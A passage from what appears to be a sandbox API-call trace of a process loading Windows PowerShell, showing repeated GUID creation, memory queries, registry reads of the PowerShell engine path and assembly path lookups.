| out: pguid=0xed330*(Data1=0x64e2ba77, Data2=0xd589, Data3=0x4ed2, Data4=([0]=0x8c, [1]=0x3c, [2]=0x11, [3]=0xcb, [4]=0xe0, [5]=0xe, [6]=0x43, [7]=0xf4))) returned 0x0 [0085.553] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.553] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xe8bc93dc, Data2=0xde7e, Data3=0x47e9, Data4=([0]=0xab, [1]=0x83, [2]=0x95, [3]=0xf8, [4]=0x7b, [5]=0x13, [6]=0x6, [7]=0x4e))) returned 0x0 [0085.553] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x39866571, Data2=0x4bba, Data3=0x4462, Data4=([0]=0x90, [1]=0x9a, [2]=0xbf, [3]=0xf2, [4]=0xe2, [5]=0xf7, [6]=0x71, [7]=0xf4))) returned 0x0 [0085.553] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x2f2b8434, Data2=0xc1aa, Data3=0x4824, Data4=([0]=0x8e, [1]=0x3d, [2]=0x6a, [3]=0x8f, [4]=0xb8, [5]=0x2f, [6]=0xff, [7]=0xd0))) returned 0x0 [0085.554] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xa6adc91f, Data2=0x8cf4, Data3=0x4965, Data4=([0]=0xb4, [1]=0xfa, [2]=0xd0, [3]=0x33, [4]=0xdc, [5]=0x6d, [6]=0xe8, [7]=0x89))) returned 0x0 [0085.554] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x3aa77750, Data2=0xd632, Data3=0x41e4, Data4=([0]=0x9a, [1]=0x61, [2]=0x66, [3]=0xa1, [4]=0x30, [5]=0x2c, [6]=0x2e, [7]=0xfa))) returned 0x0 [0085.554] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xc205c13c, Data2=0xabdc, Data3=0x4b8b, Data4=([0]=0x9c, [1]=0x82, [2]=0x3e, [3]=0x4f, [4]=0xed, [5]=0x51, [6]=0x16, [7]=0x20))) returned 0x0 [0085.554] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xac4627fb, Data2=0x8e57, Data3=0x472a, Data4=([0]=0x92, [1]=0x7b, [2]=0x95, [3]=0x2f, [4]=0x30, [5]=0x75, [6]=0x92, [7]=0xda))) returned 0x0 [0085.554] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x6113fde6, Data2=0x5107, Data3=0x4e54, Data4=([0]=0xb2, [1]=0x3e, [2]=0xc6, [3]=0xb2, [4]=0xc2, [5]=0xf2, [6]=0x10, [7]=0x98))) returned 0x0 [0085.554] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x1e256f66, Data2=0xc86e, Data3=0x455a, Data4=([0]=0x85, [1]=0x3a, [2]=0x3f, [3]=0xf, [4]=0x9, [5]=0xd7, [6]=0x60, [7]=0x17))) returned 0x0 [0085.554] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x8ba378bc, Data2=0x66cc, Data3=0x4d58, Data4=([0]=0xb5, [1]=0x5d, [2]=0xb5, [3]=0xf0, [4]=0xf1, [5]=0x77, [6]=0xe2, [7]=0xc6))) returned 0x0 [0085.554] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x4354c2e6, Data2=0xdfb1, Data3=0x4a9d, Data4=([0]=0x8f, [1]=0xcf, [2]=0xb0, [3]=0x56, [4]=0x2, [5]=0x3e, [6]=0x65, [7]=0x36))) returned 0x0 [0085.554] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x707d170d, Data2=0xc7ff, Data3=0x4933, Data4=([0]=0xa6, [1]=0xae, [2]=0xd1, [3]=0xc2, [4]=0xa7, [5]=0x1e, [6]=0x45, [7]=0x68))) returned 0x0 [0085.554] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.555] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.555] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.555] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xdba96346, Data2=0xe991, Data3=0x4b58, Data4=([0]=0x97, [1]=0xf6, [2]=0x50, [3]=0x2d, [4]=0xd, [5]=0x7d, [6]=0xc6, [7]=0x12))) returned 0x0 [0085.555] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x3306210e, Data2=0xad50, Data3=0x4895, Data4=([0]=0x8e, [1]=0x7f, [2]=0x0, [3]=0x86, [4]=0x38, [5]=0x53, [6]=0x1, [7]=0xa9))) returned 0x0 [0085.555] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xd51413fd, Data2=0xdd93, Data3=0x48ad, Data4=([0]=0x8e, [1]=0xbd, [2]=0xf, [3]=0xc6, [4]=0xef, [5]=0x3c, [6]=0xcd, [7]=0xb5))) returned 0x0 [0085.555] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x8da1e012, Data2=0x6fbd, Data3=0x4e99, Data4=([0]=0x82, [1]=0x55, [2]=0xe2, [3]=0x1a, [4]=0x35, [5]=0xf0, [6]=0x78, [7]=0xb0))) returned 0x0 [0085.555] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x69335ddf, Data2=0x5981, Data3=0x4fd2, Data4=([0]=0x81, [1]=0x1d, [2]=0x92, [3]=0x60, [4]=0x35, [5]=0xea, [6]=0x87, [7]=0xf4))) returned 0x0 [0085.555] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x659610e8, Data2=0xcfb9, Data3=0x4a55, Data4=([0]=0x83, [1]=0x86, [2]=0xba, [3]=0x5f, [4]=0xe3, [5]=0xef, [6]=0xc0, [7]=0xae))) returned 0x0 [0085.555] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x23a1df50, Data2=0xfdb, Data3=0x4a8c, Data4=([0]=0x93, [1]=0x35, [2]=0xe, [3]=0x8a, [4]=0x2b, [5]=0xc0, [6]=0x4d, [7]=0xad))) returned 0x0 [0085.556] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x25b84d3f, Data2=0xac9d, Data3=0x438a, Data4=([0]=0xa8, [1]=0xcd, [2]=0x90, [3]=0xad, [4]=0x4c, [5]=0x2b, [6]=0x95, [7]=0x18))) returned 0x0 [0085.556] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x9986c85f, Data2=0x746c, Data3=0x4a8c, Data4=([0]=0x90, [1]=0xe9, [2]=0x9, [3]=0xd2, [4]=0x2e, [5]=0x8, [6]=0xf5, [7]=0xba))) returned 0x0 [0085.556] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xb5a02e27, Data2=0x6c44, Data3=0x448c, Data4=([0]=0x8b, [1]=0xa, [2]=0x65, [3]=0xa0, [4]=0x41, [5]=0xf, [6]=0x1e, [7]=0x5a))) returned 0x0 [0085.556] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x11361c43, Data2=0x5248, Data3=0x4ec4, Data4=([0]=0x94, [1]=0x79, [2]=0xb8, [3]=0xfc, [4]=0xae, [5]=0xf0, [6]=0x4f, [7]=0xa6))) returned 0x0 [0085.556] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x832b7bdf, Data2=0x4f7a, Data3=0x490e, Data4=([0]=0x98, [1]=0x8, [2]=0x8e, [3]=0x9f, [4]=0x11, [5]=0x82, [6]=0x97, [7]=0x79))) returned 0x0 [0085.556] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x1ad475f4, Data2=0xbc8b, Data3=0x4f00, Data4=([0]=0x94, [1]=0xda, [2]=0x4e, [3]=0x27, [4]=0x88, [5]=0x8c, [6]=0x4e, [7]=0x9a))) returned 0x0 [0085.556] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.556] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xe4f58260, Data2=0x750e, Data3=0x4946, Data4=([0]=0x93, [1]=0xec, [2]=0xb1, [3]=0x67, [4]=0xe, [5]=0xf6, [6]=0xae, [7]=0x28))) returned 0x0 [0085.556] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.557] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.558] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xfd40daf6, Data2=0x58ac, Data3=0x4e5c, Data4=([0]=0xb9, [1]=0x9e, [2]=0xd, [3]=0x8f, [4]=0x60, [5]=0xbd, [6]=0xe3, [7]=0xb))) returned 0x0 [0085.558] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.558] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x28b33cee, Data2=0xe9f8, Data3=0x4d0f, Data4=([0]=0x98, [1]=0x5b, [2]=0x99, [3]=0xc0, [4]=0xc8, [5]=0x73, [6]=0x5f, [7]=0xb1))) returned 0x0 [0085.558] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xff972b31, Data2=0x7083, Data3=0x494f, Data4=([0]=0x8d, [1]=0xfc, [2]=0x9a, [3]=0x49, [4]=0x23, [5]=0xc5, [6]=0x1e, [7]=0xa4))) returned 0x0 [0085.558] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x2e46ed2f, Data2=0x473a, Data3=0x4017, Data4=([0]=0xab, [1]=0x2c, [2]=0x21, [3]=0x98, [4]=0x43, [5]=0x8a, [6]=0x6a, [7]=0xb8))) returned 0x0 [0085.558] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x85620d88, Data2=0x844a, Data3=0x4266, Data4=([0]=0x87, [1]=0x3c, [2]=0x4b, [3]=0x2, [4]=0x17, [5]=0x78, [6]=0xbe, [7]=0x98))) returned 0x0 [0085.558] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xea65c569, Data2=0xa90a, Data3=0x4f22, Data4=([0]=0x89, [1]=0x8a, [2]=0xe7, [3]=0x64, [4]=0xdc, [5]=0x35, [6]=0xc8, [7]=0xc7))) returned 0x0 [0085.558] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x654715dc, Data2=0xa955, Data3=0x4ad6, Data4=([0]=0xaf, [1]=0x40, [2]=0x63, [3]=0x87, [4]=0x3, [5]=0x41, [6]=0x74, [7]=0x6b))) returned 0x0 [0085.559] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xb966e8d0, Data2=0x3e3, Data3=0x43a9, Data4=([0]=0x91, [1]=0x1c, [2]=0xe6, [3]=0x45, [4]=0x57, [5]=0xeb, [6]=0x61, [7]=0xc3))) returned 0x0 [0085.559] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.559] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x3c8b251b, Data2=0xd68c, Data3=0x4703, Data4=([0]=0x81, [1]=0xe4, [2]=0xbe, [3]=0xd8, [4]=0x32, [5]=0xb7, [6]=0x2c, [7]=0xe8))) returned 0x0 [0085.559] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x5b4c0c46, Data2=0x91d1, Data3=0x45da, Data4=([0]=0xa8, [1]=0x30, [2]=0xec, [3]=0x0, [4]=0x14, [5]=0xa, [6]=0xd0, [7]=0xd0))) returned 0x0 [0085.559] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x32c85c4f, Data2=0x1bc4, Data3=0x4536, Data4=([0]=0x81, [1]=0xbd, [2]=0x27, [3]=0xb0, [4]=0x5d, [5]=0x9, [6]=0x6b, [7]=0xa7))) returned 0x0 [0085.559] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xc91fc3be, Data2=0x73eb, Data3=0x433a, Data4=([0]=0x98, [1]=0xca, [2]=0xc3, [3]=0xf5, [4]=0xc2, [5]=0xad, [6]=0x90, [7]=0x98))) returned 0x0 [0085.559] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x5d2f9936, Data2=0x9f3f, Data3=0x4430, Data4=([0]=0x8a, [1]=0x63, [2]=0x7a, [3]=0xbc, [4]=0x91, [5]=0xfe, [6]=0x10, [7]=0x15))) returned 0x0 [0085.559] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.559] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xce474448, Data2=0xe639, Data3=0x4d47, Data4=([0]=0xb2, [1]=0x54, [2]=0x1a, [3]=0x18, [4]=0x96, [5]=0xe7, [6]=0xe3, [7]=0xbe))) returned 0x0 [0085.560] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xba03c495, Data2=0x5d1, Data3=0x43df, Data4=([0]=0x98, [1]=0x1a, [2]=0x75, [3]=0xd2, [4]=0x38, [5]=0xf2, [6]=0x52, [7]=0x7f))) returned 0x0 [0085.560] VirtualQuery (in: lpAddress=0xebd50, lpBuffer=0xecc10, dwLength=0x30 | out: lpBuffer=0xecc10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.560] VirtualQuery (in: lpAddress=0xebd50, lpBuffer=0xecc10, dwLength=0x30 | out: lpBuffer=0xecc10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.560] VirtualQuery (in: lpAddress=0xebd50, lpBuffer=0xecc10, dwLength=0x30 | out: lpBuffer=0xecc10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.560] VirtualQuery (in: lpAddress=0xebd50, lpBuffer=0xecc10, dwLength=0x30 | out: lpBuffer=0xecc10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.560] SetErrorMode (uMode=0x1) returned 0x1 [0085.560] SetErrorMode (uMode=0x1) returned 0x1 [0085.560] GetFileType (hFile=0x308) returned 0x1 [0085.560] ReadFile (in: hFile=0x308, lpBuffer=0x39b75a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x39b75a0*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.563] SetErrorMode (uMode=0x1) returned 0x1 [0085.563] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed020 | out: lpFileInformation=0xed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0085.563] SetErrorMode (uMode=0x1) returned 0x1 [0085.563] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed108 | out: phkResult=0xed108*=0x308) returned 0x0 [0085.563] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed08c, lpData=0x0, lpcbData=0xed088*=0x0 | out: lpType=0xed08c*=0x1, lpData=0x0, lpcbData=0xed088*=0x56) returned 0x0 [0085.563] CoTaskMemAlloc (cb=0x5a) returned 0x1b26d490 [0085.563] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed05c, lpData=0x1b26d490, lpcbData=0xed058*=0x56 | out: lpType=0xed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed058*=0x56) returned 0x0 [0085.563] CoTaskMemFree (pv=0x1b26d490) [0085.563] RegCloseKey (hKey=0x308) returned 0x0 [0085.564] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x123d9874, Data2=0xe1b7, Data3=0x4072, Data4=([0]=0x81, [1]=0x46, [2]=0xfe, [3]=0x2f, [4]=0xf2, [5]=0x2f, [6]=0x1a, [7]=0x4c))) returned 0x0 [0085.564] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xfaad756e, Data2=0x1e4, Data3=0x4392, Data4=([0]=0xa0, [1]=0x99, [2]=0x60, [3]=0xfd, [4]=0x10, [5]=0x2f, [6]=0xbf, [7]=0xb))) returned 0x0 [0085.564] SetErrorMode (uMode=0x1) returned 0x1 [0085.564] SetErrorMode (uMode=0x1) returned 0x1 [0085.564] GetFileType (hFile=0x308) returned 0x1 [0085.564] ReadFile (in: hFile=0x308, lpBuffer=0x39f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x39f5388*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.566] SetErrorMode (uMode=0x1) returned 0x1 [0085.566] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed020 | out: lpFileInformation=0xed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0085.566] SetErrorMode (uMode=0x1) returned 0x1 [0085.567] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed108 | out: phkResult=0xed108*=0x308) returned 0x0 [0085.567] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed08c, lpData=0x0, lpcbData=0xed088*=0x0 | out: lpType=0xed08c*=0x1, lpData=0x0, lpcbData=0xed088*=0x56) returned 0x0 [0085.567] CoTaskMemAlloc (cb=0x5a) returned 0x1b26d490 [0085.567] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed05c, lpData=0x1b26d490, lpcbData=0xed058*=0x56 | out: lpType=0xed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed058*=0x56) returned 0x0 [0085.567] CoTaskMemFree (pv=0x1b26d490) [0085.567] RegCloseKey (hKey=0x308) returned 0x0 [0085.567] VirtualQuery (in: lpAddress=0xebba0, lpBuffer=0xeca60, dwLength=0x30 | out: lpBuffer=0xeca60*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.567] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xc9b42970, Data2=0x5226, Data3=0x4dc9, Data4=([0]=0x84, [1]=0xe0, [2]=0x85, [3]=0xf3, [4]=0x3, [5]=0x71, [6]=0x6e, [7]=0x99))) returned 0x0 [0085.567] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x67be420a, Data2=0x4567, Data3=0x478c, Data4=([0]=0x9f, [1]=0x4d, [2]=0x85, [3]=0x8d, [4]=0xdb, [5]=0x8d, [6]=0x91, [7]=0x8d))) returned 0x0 [0085.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0085.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0085.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0085.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0085.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0085.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0085.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0085.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0085.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0085.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0085.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xed0d0, 